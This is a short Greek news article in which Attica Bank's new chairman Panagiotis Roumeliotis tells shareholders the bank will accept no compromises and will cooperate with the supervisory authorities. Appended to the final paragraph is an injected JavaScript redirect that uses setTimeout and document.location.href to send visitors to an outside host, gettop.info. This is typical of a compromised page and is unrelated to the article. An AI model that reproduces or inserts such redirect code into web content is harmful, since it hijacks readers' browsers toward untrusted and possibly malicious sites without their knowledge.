Ρουμελιώτης προς μετόχους της Attica Bank: Δεν θα υπάρξουν εκπτώσεις ή συμβιβασμοί

0
11

 

Στη διάρκεια γενικής συνέλευσης στην Attica Bank ο νέος πρόεδρος Παναγιώτης Ρουμελιώτης απηύθυνσε σαφές μήνυμα προς τους μετόχους τονίζοντας ότι «δεν μπορεί κανείς απολύτως να υπονομεύσει μια τράπεζα με δηλώσεις και με δημόσιες αντιπαραθέσεις, όπως η Attica Bank, που έχει ιστορικό ρόλο και μπορεί ταυτόχρονα να διαδραματίσει σημαντικό αναπτυξιακό ρόλο«.

Ο κ. Ρουμελιώτης εξέφρασε τη λύπη του που τις τελευταίες ημέρες δημιουργήθηκε ένας τόσος μεγάλος θόρυβος σχετικά με τη νέα διοίκηση της τράπεζας.

«Δεν είμαι διατεθειμένος να παίξω κανένα πολιτικό παιχνίδι. Ως τεχνοκράτης και επαγγελματίας έχω στόχο να συνεχιστεί απρόσκοπτα η λειτουργία της Attica Bank. Μην περιμένετε εκπτώσεις, συμβιβασμούς, ούτε δεχόμαστε επιρροές από κανέναν. Είναι βέβαιος ότι θα κερδίσουμε τη μάχη για το καλό της χώρας και της τράπεζας» σημείωσε ο νέος πρόεδρος της Τράπεζας που επεσήμανε ότι η νέα διοίκηση θα συνεργαστεί πλήρως με τις εποπτικές αρχές (SSM και Τράπεζα της Ελλάδος) προκειμένου να διερευνηθούν όλα τα ζητήματα του σχετικού πορίσματος που έχουν εκπονήσει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here